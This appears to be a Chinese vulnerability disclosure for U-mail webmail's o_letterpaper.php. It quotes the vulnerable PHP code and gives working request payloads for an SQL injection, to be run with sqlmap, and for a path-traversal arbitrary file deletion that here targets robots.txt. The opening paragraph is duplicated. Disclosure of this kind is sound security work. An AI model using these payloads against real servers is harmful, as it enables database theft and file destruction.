### 简要描述: U-mail一处SQL注入+任意文件删除 ### 详细说明: o_letterpaper.php 1.sql注入: ``` if ( ACTION == "letterpaper-set" ) { $url = make_link( "option", "view", "letterpaper" ); $lp_id = gss( $_POST['id'] ); .... if ( $lp_id ) { $lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 ); ``` 没啥好分析的,直接上exp http://mail.domain.com/webmail/client/option/index.php?module=operate&action=letterpaper-set POSTdata:id=1 丢sqlmap即可跑出数据: [<img src="https://images.seebug.org/upload/201409/15002527e70b8b8b48174c8979d75588abb90dc1.png" alt="QQ20140915-1@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/15002527e70b8b8b48174c8979d75588abb90dc1.png) ### 漏洞证明: 2.任意文件删除 o_letterpaper.php ``` if ( $res ) { if ( gss( $_POST['bgImgPath'] ) ) { $imgname = $lp_id.".".fileext( $_POST['bgImgPath'] ); if ( file_exists( ROOT."client/resource/images/letterpaper/".$imgname ) ) { unlink( ROOT."client/resource/images/letterpaper/".$imgname ); } ```...
### 简要描述: U-mail一处SQL注入+任意文件删除 ### 详细说明: o_letterpaper.php 1.sql注入: ``` if ( ACTION == "letterpaper-set" ) { $url = make_link( "option", "view", "letterpaper" ); $lp_id = gss( $_POST['id'] ); .... if ( $lp_id ) { $lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 ); ``` 没啥好分析的,直接上exp http://mail.domain.com/webmail/client/option/index.php?module=operate&action=letterpaper-set POSTdata:id=1 丢sqlmap即可跑出数据: [<img src="https://images.seebug.org/upload/201409/15002527e70b8b8b48174c8979d75588abb90dc1.png" alt="QQ20140915-1@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/15002527e70b8b8b48174c8979d75588abb90dc1.png) ### 漏洞证明: 2.任意文件删除 o_letterpaper.php ``` if ( $res ) { if ( gss( $_POST['bgImgPath'] ) ) { $imgname = $lp_id.".".fileext( $_POST['bgImgPath'] ); if ( file_exists( ROOT."client/resource/images/letterpaper/".$imgname ) ) { unlink( ROOT."client/resource/images/letterpaper/".$imgname ); } ``` $res是恒存在的,所以直接看下面POST提交的bdImgPath变量,拼接imgname变量的2部分均完全可控,然后简单判断是否存在该文件,存在即删除,由此漏洞产生。 payload: http://mail.domain.com/webmail/client/option/index.php?module=operate&action=letterpaper-set POSTDATA:id=../../../../../robots&bgImgPath=.txt 以上payload删除的是robots.txt文件,若想删除别的文件,直接在id处构造文件名,在bdimgpath处构造后缀即可。
